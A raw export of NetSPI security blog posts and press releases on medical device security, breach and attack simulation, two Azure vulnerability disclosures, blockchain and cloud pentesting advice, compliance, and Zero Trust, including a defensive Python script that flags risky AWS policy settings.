Keep growing your knowledge in med device security by watching the roundtable discussion with Dr. Weir, Matt, and Curt. Their industry expertise and perspectives on trending topics such as the omnibus bill, updatability, and IoMT give anyone learning about med device security ideas on how to move their programs forward.
[post_title] => Keeping Up with Medical Device Cybersecurity
[post_excerpt] => NetSPI hosted medical device cybersecurity professionals from Medtronic, Abbott, and MITRE for a roundtable discussion on trends and best practices.
[post_name] => keeping-up-with-medical-device-cybersecurity
[post_modified] => 2023-04-12 08:18:52
[post_modified_gmt] => 2023-04-12 13:18:52
[guid] => https://www.netspi.com/?p=29923
)
[34] => WP_Post Object
(
[ID] => 29973
[post_author] => 91
[post_date] => 2023-04-09 06:26:00
[post_date_gmt] => 2023-04-09 11:26:00
[post_content] =>
NetSPI's acquisition of nVisium was featured in CRN's review of ten key cybersecurity acquisition deals in Q1 2023. Read a preview below or read the full article online here.
+ + +
The consolidation continued in the cybersecurity market during the first three months of the year, both among top vendors in the industry and major solution providers in the channel. We’ve collected details on 10 notable acquisition deals in cybersecurity that were announced or completed during the first quarter of 2023.
NetSPI Acquires nVisium
NetSPI, a provider of penetration testing services and attack surface management capabilities, said it’s expanding its capabilities for offensive security services with the acquisition in January of nVisium. The terms of the acquisition were not disclosed, and it was mainly aimed at adding talent for NetSPI’s penetration testing services, according to NetSPI CEO Aaron Shilts. The acquisition brings two “complementary offensive security teams together who are committed to delivering the highest standard of penetration testing on the market today,” Shilts said in a news release. The acquisition follows NetSPI’s $410 million funding round in October, aimed at uses including the expansion of its channel program.
NetSPI's medical device security roundtable was featured in Healthcare IT News in an article recapping the virtual event. Read the preview below or read it online here.
+ + +
Medical device innovations have enhanced healthcare and improved patient care, but they present a broad attack surface for healthcare organizations.
NetSPI, a security service company, hosted medical device product security experts to talk about the business and challenges of securing connected technologies in healthcare. They addressed sharing information across teams throughout the product lifecycle, building product security teams, legislative changes governing the space and strategies to increase the pipeline of talent.
Where does product security sit within the enterprise?
Matt Russo, senior director of product security at Medtronic, Curt Blythe, director of product security at Abbott and Matt Weir, principal cybersecurity engineer at MITRE, all agreed that, regardless of where product security teams sit, they need to be partners in product development.
Where it makes sense from a scale and efficiency perspective, there's one team dedicated to scanning devices as a centralized function with a distributed model, Blythe said.
But the key point is embedding design and security practices into what developers do every day, which ultimately enables them to move fast, "but in a safe way."
Russo said that at Medtronic, "You can really see that across the landscape."
While resource restrictions make centralized product security functions more feasible, and they generally work for Medtronic and other large organizations, he said many device companies need to look at the technical aptitude of security teams.
Is product security just a part of what they do?
Weir noted that it's hard to have a dedicated security team if you have a small product base.
"The big thing though is that you do have that integration during your product development lifecycle," he said.
When medical device developers try to add cybersecurity later into the process, it makes it much harder to be successful, he added. Weir advised integrating product security as early as possible into the product life cycle, and continuing communication as products evolve.
Product security specialists bring visibility into systems. They can then see how the devices are being used, and they are better positioned to recommend mitigations, he said.
[post_title] => Healthcare IT News: Tips on Medical Device Security from the Product Leaders' Perspective
[post_excerpt] => NetSPI's medical device security roundtable was featured in Healthcare IT News in an article recapping the virtual event.
[post_name] => healthcare-it-news-medical-device-security
[post_modified] => 2023-04-17 18:27:25
[post_modified_gmt] => 2023-04-17 23:27:25
[guid] => https://www.netspi.com/?p=29970
)
[36] => WP_Post Object
(
[ID] => 29878
[post_author] => 91
[post_date] => 2023-04-04 09:00:00
[post_date_gmt] => 2023-04-04 14:00:00
[post_content] =>
As the tools, technology, and processes to launch cyberattacks become increasingly sophisticated, organizations’ security controls must be more proactive than ever to get ahead of potential breaches by identifying vulnerabilities before they become an issue.
Unfortunately, few executives are confident in their company’s security effectiveness. Research from Accenture found that only 52 percent of security executives and 38 percent of non-security executives agree that their organization is well-protected from cyber threats.
To get ahead of the latest cybersecurity threats, forward-thinking organizations are turning to breach and attack simulation (BAS). In fact, research projected the breach and attack simulation market to reach $1.12 billion by the end of 2022 and to grow at a compound annual growth rate of 35.12% through 2032.
If protecting sensitive data and preventing access to critical systems is a goal for your organization, then learn more about BAS solutions, including its benefits, use cases and what to look for in a vendor to enhance security posture.
What is Breach and Attack Simulation?
Breach and attack simulation (BAS) is an advanced security testing method that involves playing the role of a sophisticated real-world threat actor to assess an organization’s security controls. BAS is defined by the larger market as automated security control validation that allows for continuous simulation, in most cases focused on validating detective control coverage. Market intelligence firm IDC defines key functions of BAS, including:
Attack: mimic real threats
Visualize: see exposures
Remediate: address gaps
In today’s evolving threat landscape, a single click can expose an organization’s global environment to an adversary. Breach and attack simulation plays a critical role in protecting organizations’ systems and infrastructure by simulating common attack methods throughout the cyber kill chain and offering expert counsel to prioritize remediation steps.
Advantages of Breach and Attack Simulation at Your Organization
According to NetSPI data, 80 percent of common attack behaviors are missed by out-of-the-box solutions for endpoint detection and response (EDR), security information and event management (SIEM), and managed security service providers (MSSPs). This can leave organizations with a false sense of security.
While 100 percent detection doesn’t exist, breach and attack simulation can improve security controls to better detect a wide range of relevant attacks.
Key benefits of breach and attack simulation include:
Test your organization’s security controls and defend against emerging cyber threats and attacks. To stay ahead of malicious actors and threats, organizations must focus on detecting threats before an attack. An advanced BAS solution can continuously replicate real attack behavior, measure the effectiveness of security controls and identify gaps with customizable procedures. Because BAS mimics real-world threat actors, security teams can identify common adversary behaviors and — armed with this information — more effectively prioritize detection development as well as investments.
Meet the challenge of today’s cybersecurity skills gap. Reliance on technology has increased the need for workforces with technical expertise. The number of open positions in cybersecurity is increasing while the demands put on employees are expanding, leaving fewer people to take on more responsibilities. Breach and attack simulation is a step in the right direction to combat today’s skills gap by directing the security team’s focus toward the most impactful actions.
Help operational development and measure detective controls. BAS not only educates SOC teams on their environment and common attack behaviors, but it also helps enhance security programs by validating the efficacy of detective controls. NetSPI helps define KPIs upfront so security teams can track effectiveness over time. Data is consolidated into one centralized platform with the ability to configure and run customizable procedures.
Justify security spending and make the case for increased budget. A common goal for any security team is demonstrating the effectiveness of security spending to executive leadership and the board of directors. And cybersecurity is increasingly becoming a top strategic business priority across organizations, with Gartner predicting that 40 percent of boards of directors will have a dedicated cybersecurity committee by 2024. This has the potential for CISOs and security teams to receive more scrutiny, but also presents opportunities for increased security support and resources.
With comprehensive breach and attack simulation services, findings are delivered with descriptions, procedures, and recommendations based on expert human analysis. Actionable insights are also available to track and trend your security posture, benchmark against industry competitors, and measure ROI, which can help make the case for an expanded security budget.
Examples of Breach and Attack Simulation from Gartner
As threats rapidly evolve, breach and attack simulation vendors continue to improve and expand their technology, features, and scope. While BAS has a wide range of use cases, some common examples Gartner listed include:
Complete an attack simulation procedure to better understand gaps in an organization’s security defenses and identify actionable steps to improve security controls
Gain an attacker’s outside perspective of an organization’s environment and systems
Work in partnership with red teams to run BAS procedures using the methods and approach of real adversaries in a controlled environment
Leverage findings from the simulation to flag top risks and vulnerabilities, and identify actionable steps for remediation
Quick Guide to Evaluating Breach and Attack Simulation Vendors
Several breach and attack simulation services are available on the market and selecting a partner with advanced technology and a team of proven security experts is critical to protecting against the latest threats. Review the key criteria below to take into consideration when assessing different breach and attack simulation vendors:
A single, centralized platform to consolidate and organize relevant data
Capabilities for BAS services to be automated, consistent, and continuous
White-glove service and communication available throughout the engagement from experienced, trained professionals
Customizable procedures to gain an attacker’s view of your environment at scale
Seamless user experience (UX) and user interface (UI) for both expert and novice users
Extensive, consistently updated security plays and playbooks that enable organizations to strengthen their security posture
Real-time, actionable data to identify trends and coverage gaps, benchmark security posture against competitors, measure ROI of security investments, and prioritize remediation efforts
Test your security controls with NetSPI’s Breach and Attack Simulation
Protecting your business effectively against security threats requires a reputable, expert partner. For more than 20 years, NetSPI’s global cybersecurity experts have been trusted partners in securing the world’s most prominent organizations.
NetSPI’s Breach and Attack Simulation enables organizations to create and execute customized procedures utilizing purpose-built technology. Professional human pentesters simulate real-world attacker behaviors, not just indicators of compromise (IOCs), putting your detective controls to the test in a way no other BAS solution can.
With the combination of the AttackSim cloud-native technology platform and personalized counsel from NetSPI’s manual testing teams, your organization can build resilience against ransomware, denial of service, data loss, fraud, information leaks, and more.
[post_title] => What You Need to Know about Breach and Attack Simulation
[post_excerpt] => Breach and Attack Simulation from NetSPI puts any detective controls to the test by continuously simulating real-world attack behaviors.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => what-you-need-to-know-breach-and-attack-simulation
[to_ping] =>
[pinged] =>
[post_modified] => 2023-04-05 15:53:29
[post_modified_gmt] => 2023-04-05 20:53:29
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29878
[menu_order] => 63
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[37] => WP_Post Object
(
[ID] => 29818
[post_author] => 91
[post_date] => 2023-03-30 08:00:00
[post_date_gmt] => 2023-03-30 13:00:00
[post_content] =>
NetSPI VP of Research finds cross-tenant compromise in popular Azure automation tool, works closely with Microsoft to remediate the issue.
Minneapolis, MN – NetSPI, the leader in offensive security, today disclosed the threat research findings of Vice President of Research Nick Landers, who discovered and reported a cross-tenant compromise in Power Platform Connectors, a first-party provider hosted in Microsoft Azure.
In close collaboration with NetSPI, Microsoft quickly fixed the issue. Due to the cross-tenant implications of this vulnerability, if it were left unresolved, malicious attackers could have jumped between tenants using the Power Platform Connectors backend and gained access to sensitive data, Azure access tokens, and more.
As background, Azure features a large suite of automation tools, including Logic Apps and the Power Platform. On-Prem Data Gateways extend these automation tools, allowing actions to be carried out by a connected agent installed locally in customer networks – which is where Landers found the vulnerability. Originally, these gateways were intended for personal use only, but users can also connect them to an Azure tenant and make them available to the larger subscription. In Landers’ research, he inspected how these Logic Apps interact with data gateways and discovered remote code execution opportunities on both the gateways themselves and the supporting Power Platform Connectors hosted in Azure, allowing for the compromise of cross-tenant data.
“This vulnerability is yet another example of just how pervasive deserialization flaws continue to be, especially for large technology vendors like Microsoft,” explains Landers. “Security teams should be aware of deserialization-based vulnerabilities, assume most connected systems and apps are exploitable, and understand that the simple exploitation might be buried in a bit of technical complexity. I welcome the research community to join me in continued deserialization research as we work to make cross-tenant environments more secure.”
Landers worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue. As a resolution, the Power Platform team completely rebuilt their serialization binder to enforce stricter whitelists, while creating distinct binders for both gateway and cloud environments.
NetSPI is the leader in enterprise penetration testing, attack surface management, and breach and attack simulation – the most comprehensive suite of offensive security solutions. Through a combination of technology innovation and human ingenuity, NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and the top 50 companies in the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.
[post_title] => NetSPI Uncovers Cross-Tenant Azure Vulnerability in Power Platform Connectors
[post_excerpt] => Learn how NetSPI VP of Research found a cross-tenant compromise in popular Azure automation tool and worked with Microsoft to remediate the issue.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => azure-vulnerability-power-platform-connectors
[to_ping] =>
[pinged] =>
[post_modified] => 2023-03-29 14:14:44
[post_modified_gmt] => 2023-03-29 19:14:44
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29818
[menu_order] => 66
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[38] => WP_Post Object
(
[ID] => 29770
[post_author] => 91
[post_date] => 2023-03-28 09:00:00
[post_date_gmt] => 2023-03-28 14:00:00
[post_content] =>
Blockchain is an effective business strategy that extends beyond the buzz of cryptocurrencies. Businesses are using blockchain for real-time transactions and secure payments at scale. Blockchain deployments vary for every organization, but its many uses and successes so far make it a technology to keep researching.
Planning for cybersecurity at the beginning of blockchain exploration helps create more secure deployments, especially when working with valuable financial information. The six questions below can guide internal conversations to align resources around secure blockchain deployments. Get more blockchain security tips in our eBook, “5 Blockchain Security Fundamentals Every C-Suite Needs to Know.”
Definition of Blockchain, or Distributed Ledger Technology (DLT)
Distributed Ledger Technology (DLT), commonly known as “blockchain” is a distributed database secured with cryptography. How this unfolds in reality has many interpretations. One commonality runs through every blockchain use: every participant has a vested interest in the trustworthiness of the data. This creates an environment for secure transactions after servers, or nodes, work together to establish the real state of a database.
“Blockchain is fundamentally a distributed database secured with cryptography.”
One example of blockchain is smart contracts. They act as web applications stored directly on the chain and operate deterministically without requiring an entity to execute the code. Smart contracts allow responsible parties to communicate information including transactions without the use of an intermediary.
The many unique use cases of blockchain give it vast appeal, but it may be particularly useful in industries such as large financial institutions and retail groups.
Blockchain Security in Deployments
Much of the data handled with blockchain is considered sensitive, therefore making it valuable to malicious actors. As with many newer technologies, vulnerabilities can become an issue if security is not baked in from the start.
“Like any other technology, security flaws are typically discovered/introduced during integration, as opposed to being inherent to the technology itself.”
Blockchain security issues can emerge from container configurations, vulnerable contract code, or weak permission models to name a few. Exploring blockchain uses through a cybersecurity lens puts organizations ahead of weaknesses or gaps before vulnerabilities occur.
6 Questions to Prioritize Blockchain Security
These guiding questions will help uncover expectations and requirements as companies continue blockchain research. Use these as a starting point to gain alignment between IT and security teams, as well as other internal departments who may be affected by blockchain use.
Are teams in my organization pursuing blockchain uses? Have they consulted the security team for potential risks? Do we have trusted providers in place for third-party blockchain pentesting? Are we rushing the development of DLT solutions without proper security processes in place?
What chain technologies are going to be part of our deployments? Are these chains public/permissionless chains like Ethereum or Bitcoin? Or do we want to work with a permissioned chain system like Hyperledger?
Are we developing or deploying smart contracts? Do we have a secure SDLC process developed for DLT? Is our development team properly trained in the security considerations of the chain? How will we support contract updates and security fixes? Do we have code audit plan in place?
Are we running our own nodes as part of the chain use? Will these be deployed on-premises, in Azure/AWS, or via a managed provider like IBM or Oracle? Have we considered configuration reviews for the supporting containers and hosts? Do we have threat models for other malicious nodes on the chain? Have we considered supply-chain threats for the code base?
Are we performing any custodial or direct ownership of digital assets? Is transaction signing and logic part of our solution? How are we securely managing cryptographic keys? Do we have key recovery process in place? Are we relying entirely on third party APIs to access the chain?
Are we integrating with any off-chain assets (databases, APIs, etc.)? Have we mapped out threat scenarios related to state-desynchronization? Are we properly leveraging the native security of chain transactions for key logic? Are we storing sensitive data on the chain?
Make Blockchain Security Part of Your Strategy
The goal of DLT is to create a shared database which can be trusted by multiple entities who don’t necessarily trust one another. Blockchain is the answer to this challenge, but it's a newer technology with its full potential still being realized.
[post_title] => 6 Questions to Plan for Blockchain Security
[post_excerpt] => These six questions will help teams plan for blockchain security from the start to get ahead of potential gaps that can result in vulnerabilities.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => blockchain-security
[to_ping] =>
[pinged] =>
[post_modified] => 2023-03-27 15:22:53
[post_modified_gmt] => 2023-03-27 20:22:53
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29770
[menu_order] => 67
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[39] => WP_Post Object
(
[ID] => 29763
[post_author] => 91
[post_date] => 2023-03-23 08:00:00
[post_date_gmt] => 2023-03-23 13:00:00
[post_content] =>
Cloud penetration testing leader identifies privilege escalation flaw in Azure’s popular solution for building cloud-native applications.
Minneapolis, MN – NetSPI, the leader in offensive security, today published details on a vulnerability found by Vice President of Research Karl Fosaaen, who discovered a flawed functionality in Azure Function Apps that allowed for privilege escalation.
Fosaaen and the NetSPI research team worked closely with Microsoft to resolve the issue. If left unresolved, users with ‘read only’ permissions on a Function App could gain full access to the Azure Function App container, granting them the ability to view and alter highly sensitive information, like backend code databases and password vaults.
Function Apps is used for building cloud-native applications in Azure. At its core, Function Apps is a lightweight API service that can be used for building and hosting serverless applications. The Azure Portal allows users to view files associated with the Function App, along with the code for the application endpoints.
“We see the Function Apps service used in about 80 percent of our penetration testing environments. With this being a privilege escalation issue, a minimally authorized user could have been given access to critical, often restricted roles that would allow them to pivot within an Azure subscription,” said Fosaaen. “Given the simplicity of the issue, it’s surprising that this vulnerability has made it this far without previously being detected, especially with the rise in APIs and cloud-native apps over the past few years.”
https://youtu.be/ClCeHiKIQqE
Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the file access issues. The Reader role no longer has the ability to read files with the Function App VFS APIs. A technical overview of the vulnerability can be found on the NetSPI blog.
The NetSPI Labs innovation and research group plans to continue exploring read-only privilege escalation opportunities across Azure. You can see the team’s cloud security research and past vulnerability disclosures at www.netspi.com.
Cloud computing has transformed the way organizations operate, providing unparalleled flexibility, scalability, and cost-efficiency. However, with these benefits come new security challenges and emerging risks. As organizations increasingly move their operations to the cloud, ensuring the security and privacy of data has become more critical than ever. A robust cloud penetration testing program helps internal IT teams protect their organizations by identifying and mitigating security risks in the cloud.
A pitfall organizations face when building a cloud pentesting strategy is handling rapid cloud migration. An application hosted on-prem will have significantly different security requirements from one in the cloud, and cloud security controls are often more complex, with intricate nuances. Another pitfall is assuming that cloud services are secure by default. Even though the cloud provider manages some aspects of security, organizations still have a responsibility to understand exactly what is within their control to secure, and the provider's default settings are not always the most secure for every environment. This differs from a traditional security program because of the shared responsibility, or "shared fate," model.
With this model in mind, organizations need to look at the key components of a comprehensive cloud penetration testing program in light of their business objectives to implement a secure cloud effectively.
Best Practices to Create a Cloud Penetration Testing Program
Creating a secure cloud is a complex undertaking with decisions that need to be tailored to your business goals and tech stack. Thomas Elling and the Cloud Pentesting team have compiled three aspects of creating a cloud pentesting program that will help any team incorporate security protocols from ideation to deployment.
1. Building a secure cloud from the start
Making security-conscious design decisions from the start of a cloud adoption helps IT teams avoid retroactive decisions that result in rework and disjointed integration of technologies. It’s important to consider this from a human element and a technical one. For example, from the human lens, consider partnering security engineers and pentesters with DevOps groups to create secure by default environments. Whereas from a technical standpoint, consider using Infrastructure as Code (IaC) adoption to help enforce a security baseline.
2. Performing regular configuration reviews and pentesting
Regular configuration reviews and cloud pentesting exercises are extremely valuable because of their ability to focus remediation efforts on prioritized vulnerabilities. Identifying security misconfigurations is a critical first step to securing an environment, which makes configuration reviews so imperative. They should be done on a regular basis to identify factors such as inadvertent public access or excessive IAM permissions.
Pentesting is another integral part of cloud security which aims to demonstrate the impact of the identified misconfigurations. This often includes chaining misconfigurations together to prove privilege escalation. The key difference between this and a typical configuration review is the fact that pentests leverage misconfigurations to demonstrate the potential impact of a successful attack. Oftentimes, the full impact of a misconfiguration is not fully understood until it is paired with one or more other vulnerabilities in the environment.
3. Establishing security guardrails
Guardrails are sets of automated policies and controls that are designed to prevent or mitigate security risks and ensure compliance with security standards and regulations. Results of configuration reviews and pentests should always be discussed to identify the root cause. If a vulnerability was introduced via configuration drift, one preventative action would be implementing a security guardrail to ensure that misconfigurations cannot be introduced in the future.
Whether your cloud infrastructure resides in AWS, Azure, or GCP, these three fundamentals will help internal teams build — and maintain — a secure cloud from all angles.
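As an added example (not NetSPI's code or tooling) of the configuration review and guardrail described above, this Python script runs the two checks the article names, inadvertent public access and excessive IAM permissions, over constructed AWS-style policy documents, and then applies the same checks as a pre-deploy gate so that configuration drift cannot reintroduce a finding. All resource names and the account ID are constructed.

```python
"""Added example: a minimal cloud configuration review plus a pre-deploy guardrail.

Constructed AWS-style IAM and S3 bucket policy documents are embedded inline.
review_environment() is the periodic configuration review; guardrail() applies
the same checks to a proposed change before it is accepted.
"""
import json
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    resource: str
    issue: str
    statement: dict


def _as_list(value):
    """Policy fields may be a single string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_public_principal(principal):
    """"*" or {"AWS": "*"} grants access to anyone, including unauthenticated callers."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any(p == "*" for v in principal.values() for p in _as_list(v))
    return False


def review_policy(name, policy):
    """Return findings for one policy document (identity or resource policy)."""
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        # Inadvertent public access: wildcard principal with no Condition narrowing it.
        if _is_public_principal(stmt.get("Principal")) and not stmt.get("Condition"):
            findings.append(Finding(name, "public-access", stmt))
        # Excessive permissions: admin-equivalent or service-wide wildcards on every resource.
        wildcard_actions = [a for a in actions if a == "*" or a.endswith(":*")]
        if wildcard_actions and "*" in resources:
            findings.append(Finding(name, "excessive-permissions", stmt))
    return findings


def review_environment(policies):
    """Configuration review: run every policy in the environment through the checks."""
    findings = []
    for name, doc in policies.items():
        findings.extend(review_policy(name, doc))
    return findings


def guardrail(name, proposed_policy):
    """Pre-deploy guardrail: a change is accepted only if it produces no findings."""
    findings = review_policy(name, proposed_policy)
    return (len(findings) == 0, findings)


# Constructed sample policies; names and the account ID are placeholders, not real resources.
SAMPLE_POLICIES = {
    "s3:reports-bucket": {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::reports-bucket/*",
        }],
    },
    "iam:ci-deploy-role": {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Action": ["iam:*", "s3:PutObject"],
            "Resource": "*",
        }],
    },
    "iam:log-reader-role": {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Action": ["logs:GetLogEvents"],
            "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:app:*",
        }],
    },
}

if __name__ == "__main__":
    for f in review_environment(SAMPLE_POLICIES):
        print(f"{f.resource}: {f.issue} -> {json.dumps(f.statement)}")
    ok, _ = guardrail("iam:ci-deploy-role", SAMPLE_POLICIES["iam:ci-deploy-role"])
    print("guardrail accepts ci-deploy-role change:", ok)
```

Replacing the bucket policy's wildcard principal with a specific role ARN makes the same guardrail accept the change, which is the root-cause fix the article asks teams to carry back from a finding.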
Refine Your Cloud Pentesting Program with NetSPI
These steps represent some of the basic ways to create a security-first cloud environment through regular review processes. While there is no one-size-fits-all approach, these points can be modified to fit any cloud environment. Ultimately, organizations should prioritize remediation of vulnerabilities with a risk-based approach.
Environments that carry higher risk, such as ones that deal with sensitive data or may have external exposure, would be candidates for more frequent reviews. One factor that could trigger a review is any fundamental change made by the cloud provider to a core service.
However, this is not to say that lower-risk environments, like a dev environment with test data, are not important. Escalation paths from dev environments into production can be extremely impactful. Lastly, organizations looking to build out and strengthen their cloud pentesting programs need to investigate the root cause of identified vulnerabilities in order to ensure that the same, or similar, issues do not happen again.
Working with a penetration testing partner to enhance cloud security can help streamline efforts and deliver value quickly. As a leader in offensive security, NetSPI helps companies establish and enhance their secure cloud strategies. Contact our security consultants to get started on a strong cloud penetration testing program.
[post_title] => 3 Fundamentals for a Strong Cloud Penetration Testing Program
[post_excerpt] => The cloud reigns supreme, making it a target for threat actors. Learn the basics of creating and enhancing a secure cloud penetration testing program.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => cloud-penetration-testing-program
[to_ping] =>
[pinged] =>
[post_modified] => 2023-03-20 15:46:28
[post_modified_gmt] => 2023-03-20 20:46:28
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29724
[menu_order] => 70
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[41] => WP_Post Object
(
[ID] => 29699
[post_author] => 91
[post_date] => 2023-03-14 09:00:00
[post_date_gmt] => 2023-03-14 14:00:00
[post_content] =>
NetSPI Field Chief Information Security Officer (CISO) and host of the Agent of Influence podcast, Nabil Hannan, invited Marc Rubbinaccio, Senior Compliance Manager at Secureframe, onto episode 53 to discuss how security fits into compliance, and vice versa.
The conclusion? Compliance doesn’t equate to security, but it is a strong starting point. Cybersecurity compliance provides a trustworthy baseline to establish a more mature security posture, especially for companies that are beginning to build their cybersecurity program from the ground up.
Dive into the highlights below, then head over to Agent of Influence and listen to the full episode.
Reframing the Mentality of Cybersecurity Compliance
The sentiment around compliance often centers around meeting requirements, not building an effective security program — but Marc offers a refined perspective. He poses that this mentality may be more prevalent at enterprise organizations with advanced security processes, making the baseline security controls outlined in compliance more of a check-the-box exercise, as opposed to a preventative cybersecurity strategy.
But following the baseline security controls outlined in security frameworks is a prime starting point for small businesses and growing organizations.
Technology is evolving faster than compliance can keep up with, which has led the PCI DSS council to allow a more customized approach to meeting requirements. This allows companies to keep their current systems and implementations in place, without the need to invest in expensive new technologies. If companies can prove that what they’ve implemented meets the intent of the requirement, then these revised standards within PCI DSS v4.0 allow security teams to stay the course.
Choosing a Security Compliance Framework
Common company activity that requires cybersecurity compliance includes storing, processing and transmitting data in a way that can impact the security of customer information. Marc advises listeners to first select a cybersecurity framework that could be required within their industry. For example, HIPAA for healthcare, or GDPR for organizations responsible for the privacy of European customer data. Choosing a security framework and sticking to it helps guide decisions throughout the many steps within a compliance journey.
“In my opinion, SOC2 and ISO27001, these frameworks are an amazing way for startups and small businesses to build a baseline security posture that they can not only be proud of but also be confident that their customers’ data is indeed secure.”
Marc Rubbinaccio, Secureframe
Marc recommends two frameworks for organizations starting their path toward cybersecurity compliance:
SOC 2: The American Institute of Certified Public Accountants (AICPA) centers the SOC 2 framework around five Trust Services Criteria: security, availability, processing integrity, confidentiality, and privacy.
ISO 27001: The International Organization for Standardization (ISO), in partnership with the International Electrotechnical Commission (IEC), developed ISO 27001 as the current standard for managing information security. ISO 27001 encourages the adoption of an Information Security Management System to protect the confidentiality, integrity, and availability of information.
These well-known security frameworks help organizations establish policies and procedures, access control, change management, and even risk management, resulting in an inherently stronger cybersecurity posture.
Changes to PCI DSS v4.0
Marc’s area of focus is PCI DSS, which recently released an updated version, PCI DSS 4.0. Changes include stricter multifactor authentication and stronger password security requirements, among others. The organizations most impacted by these changes are the ones maintaining Self-Assessment Questionnaire A (SAQ A), which is used when merchants outsource all aspects of payment processing (capture, storage, and transmission of cardholder data) to a third-party service provider.
These changes were driven by the increase in e-skimming attacks on payment pages, a technique used to intercept private information as it is entered into a web form. To help combat these increasing attacks, SAQ A now requires controls around any script executed in the customer’s browser, in addition to external vulnerability scanning.
With all of these never-ending changes, what can internal IT teams do to keep up with security compliance?
“The strongest and most powerful tool you have are the experts that you work with.”
Marc Rubbinaccio, Secureframe
How Organizations Can Prepare for Changes to Security Compliance
Keeping up with all the changes to compliance standards is difficult, which is why leaning on the people and tools around you is essential. When looking at best practices for keeping up with changes to security compliance, use your connections as a resource.
Whether your organization partners with a third party or uses a particular auditor, you can lean on these experts for guidance on decisions to adhere to your chosen framework. It's OK to reach out directly to your auditor to discuss the latest changes to the frameworks and how they may affect your environment as it stands today. These conversations will put you ahead of the game when it’s time for your next audit.
The Intersection of Pentesting and Security Compliance
Penetration testing is critical in vulnerability management programs because it takes vulnerability scanning a step further. Scanners fingerprint operating system and software versions and compare them against publicly known vulnerable versions, and they also fuzz, that is, mass-inject data into input fields to discover vulnerabilities. Scanners are a great tool for identifying assets and surface-level vulnerabilities, while pentesting uses the data found by scanners to try to exploit a vulnerability and continue to pivot within your environment.
The additional steps performed by penetration testing help internal teams discover deeper issues within their environment, prioritize risks, and remediate gaps. Compliance frameworks have recognized how important pentests are, with some of them, including PCI, FedRAMP, and HITRUST, requiring penetration testing annually and whenever significant changes occur.
Compliance doesn’t equate to security, but these well-known frameworks are a strong starting point. Keep growing your security compliance education by listening to Marc’s podcast episode here.
Post: How to Build a Baseline Cybersecurity Posture with Security Compliance (netspi.com, last modified 2023-06-22). Excerpt: Compliance manager Marc Rubbinaccio joins NetSPI to discuss how a secure environment and security compliance go hand-in-hand.
Post published 2023-03-07 (netspi.com):
On Episode 46 of NetSPI’s Agent of Influence podcast, host and NetSPI Field Chief Information Security Officer (CISO) Nabil Hannan invited Hudl CISO Rob LaMagna-Reiter to discuss a future-focused approach to Zero Trust. They cover three misconceptions IT teams typically encounter throughout Zero Trust implementation, as well as broader topics including the definition of Zero Trust, reputable frameworks to reference, and long-term budgeting for an enhanced cybersecurity strategy. Read the recap below for the top takeaways, then head over to our podcast page to listen to the full episode.
3 Misconceptions of Zero Trust Implementation
One of the conversations on this episode centered around common misconceptions teams face when they plan for Zero Trust. The modern cybersecurity model presents universal challenges on the path to a greater end state of cybersecurity that can stall organizations on their progress. Help internal teams move beyond these common blockers and continue momentum on security initiatives by learning about the counterpoints to Zero Trust misconceptions.
Misconception #1: Zero Trust is identity, or Zero Trust is the new perimeter.
Truth: Identity is an important aspect of Zero Trust, but no singular pillar comprises Zero Trust.
The chatter around Zero Trust is dense, leading to mixed messages about what Zero Trust is and isn’t. Vendors can perpetuate this confusion by labeling products as Zero Trust or selling a one-and-done solution that promises relentless security. While identity is an important pillar of Zero Trust, it is only one aspect of the overarching strategy. Too narrow a focus on a single pillar leaves gaps in the Zero Trust implementation, keeping your company in the crosshairs of a potential breach.
https://youtube.com/shorts/91TPs4HGww0
Misconception #2: Zero Trust is a product.
Truth: Zero Trust is a methodology to achieve a greater end state of cybersecurity.
Again, the varied messages about Zero Trust from vendors who sell a single solution dilute its meaning as an overall strategy. Zero Trust is not a product or a platform, and no single solution can achieve Zero Trust. It is a framework for organizations to approach more secure systems and align their internal thinking to systematically enhance security across many areas of a business.
Misconception #3: Zero Trust is a complicated dream state that isn’t possible to achieve.
Truth: Taking incremental steps toward Zero Trust by following a roadmap tailored to your organization decreases the intimidation of Zero Trust and provides quick wins to build momentum for continued progress.
This is the most common misconception we hear in conversations. Zero Trust is complex, and when you try to solve for everything at once, it can seem overwhelming. Following a Zero Trust roadmap with relevant KPIs tailored to your organization is the key to success. This can include mapping out data flows and the attack surface, and building a strategy around identifying, classifying, and tagging critical applications.
“The most complicated thing about Zero Trust is it actually forces you to understand your business deeply. It forces you to know more about the business than the business might know about itself.”
